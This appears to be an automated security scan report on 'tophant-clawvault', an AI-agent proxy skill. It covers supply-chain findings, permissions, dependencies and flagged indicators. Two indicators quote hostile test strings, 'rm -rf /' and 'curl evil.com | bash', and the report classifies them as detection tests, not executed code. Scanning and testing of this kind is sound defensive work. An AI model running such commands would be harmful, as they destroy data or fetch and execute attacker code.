Low risk: risk score 25/100
Last scan: 21 hours ago
tophant-clawvault
AI security system protecting agents from prompt injection, data leakage, and dangerous commands via local HTTP proxy
ClawVault is a legitimate AI security tool with good documentation; the flagged IOCs are test strings not executed code, though there are minor supply chain concerns.
Skill name: tophant-clawvault
Analysis time: 40.0s
Engine: pi
Can be installed
Approve for use with caution: pin ClawVault to specific version before installation to mitigate supply chain risk.

Security findings (3)

Severity · Finding · Location

[Medium] Unpinned package version range (supply chain)
  Install command uses 'clawvault>=0.1.0,<1.0.0', allowing any 0.x.x version, including potentially malicious future releases.
  Evidence: pinned_version = "clawvault>=0.1.0,<1.0.0"
  → Pin to a specific version: pip install clawvault==0.1.0, or use hash verification
  Location: clawvault_manager.py:88

[Medium] GitHub fallback without integrity verification (supply chain)
  Fallback installation from GitHub tag '@v0.1.0' lacks checksum or hash verification.
  Evidence: git+https://github.com/tophant-ai/[email protected]
  → Use a specific commit hash or package hash verification for GitHub installations
  Location: clawvault_manager.py:98

[Low] SSL verification disabled in default config (sensitive access)
  Default config sets ssl_verify: False for MITM inspection; documented but risky.
  Evidence: "ssl_verify": False
  → Ensure the tool runs only on trusted networks; document the SSL bypass implications
  Location: clawvault_manager.py:154

Resource type | Declared permission | Inferred permission | Status | Evidence
Command execution | WRITE | WRITE | ✓ consistent | clawvault_manager.py:88 pip install
File system | WRITE | WRITE | ✓ consistent | clawvault_manager.py:137 config write
Network access | READ | WRITE | ✓ consistent | SECURITY.md documents MITM proxy
File system | READ | READ | ✓ consistent | ~/.ClawVault/config.yaml only

Indicators: 5 findings (2 critical)

💀 Critical · Dangerous command · Dangerous shell command
  rm -rf /
  clawvault_manager.py:401

💀 Critical · Dangerous command · Dangerous shell command
  curl evil.com | bash
  clawvault_manager.py:402

🔗 Medium · External URL · External URL
  http://127.0.0.1:8766
  SECURITY.md:51

🔗 Medium · External URL · External URL
  https://docs.openclaw.ai/gateway/security
  SECURITY.md:256

📧 Info · Email · Email address
  [email protected]
  SECURITY.md:242

Directory structure

5 files · 37.6 KB · 1120 lines
Python 1 file · 581 lines · Markdown 3 files · 493 lines · JSON 1 file · 46 lines
├─ 🐍 clawvault_manager.py Python 581L · 21.4 KB
├─ 📝 README.md Markdown 79L · 2.2 KB
├─ 📝 SECURITY.md Markdown 262L · 8.7 KB
├─ 📋 skill.json JSON 46L · 1.9 KB
└─ 📝 SKILL.md Markdown 152L · 3.5 KB

Dependency analysis (3)

Package | Version | Source | Known vulnerabilities | Notes
pyyaml | * | pip | | Not explicitly pinned in skill
requests | * | pip | | Not explicitly pinned in skill
clawvault | >=0.1.0,<1.0.0 | pypi/github | | Version range unpinned: supply chain risk

Security highlights

✓ Comprehensive documentation including SECURITY.md with threat model
✓ Test IOCs (rm -rf, curl|bash) are test strings, not executed code: legitimate detection testing
✓ All network calls are to localhost for proxy operations
✓ No credential harvesting or exfiltration detected
✓ No obfuscation or base64 execution observed
✓ Skill behavior matches documentation (MITM proxy for AI security)